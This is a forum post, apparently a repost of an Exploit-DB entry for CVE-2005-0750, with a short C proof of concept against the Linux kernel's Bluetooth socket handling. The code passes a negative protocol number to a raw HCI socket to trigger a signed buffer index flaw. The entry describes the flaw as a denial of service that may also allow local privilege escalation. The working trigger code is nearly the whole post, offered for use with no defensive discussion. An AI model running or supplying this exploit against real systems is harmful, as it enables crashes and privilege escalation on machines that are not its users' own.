Exploit Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC)

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
25287
Проверка EDB
  1. Пройдено
Автор
ILJA VAN SPRUNDEL
Тип уязвимости
DOS
Платформа
LINUX
CVE
cve-2005-0750
Дата публикации
2005-03-28
C:
/*
EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/

source: https://www.securityfocus.com/bid/12911/info

A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes.

A local attacker may leverage this issue to gain escalated privileges on an affected computer. 
*/

#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>

main()
{
        int ctl;

        /* Open HCI socket  */
        if ((ctl = socket(AF_BLUETOOTH, SOCK_RAW, -1111)) < 0)
        {
                perror("Can't open HCI socket.");
                exit(1);
        }
}
 
Источник
www.exploit-db.com

Похожие темы